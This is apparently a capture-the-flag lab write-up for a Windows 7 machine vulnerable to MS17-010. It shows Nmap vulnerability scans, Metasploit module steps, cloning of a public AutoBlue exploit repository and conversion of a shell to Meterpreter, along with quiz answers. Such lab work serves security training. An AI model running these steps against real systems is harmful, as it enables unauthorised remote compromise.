BLUE

OS: Windows

بسم الله الرحمن الرحيم

Recon

using Nmap

nmap 10.10.55.229 -sV -sC

How many ports are open with a port number under 1000?

sudo nmap 10.10.55.229 -p 1-1000  #Result = 3

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

sudo nmap 10.10.55.229 -sV  -p T:135,139,445 --script="smb-vuln-*"

the OS windows VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)

Gain Access / initial Access

using MSF6

msfconsole
search ms17-010
use 0
options
set RhOSTS

My connection was cut off there was a problem with vpn

but in my PC FAIl

i will try search I Found exploit https://github.com/3ndG4me/AutoBlue-MS17-010

git clone  https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010/shellcode 
./shell_prep.sh

Escalate

If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

Answer post/multi/manage/shell_to_meterpreter

Select this (use MODULE_PATH). Show options, what option are we required to change?

Answer session

PreviousPage NextmKingdom

Last updated 6 months ago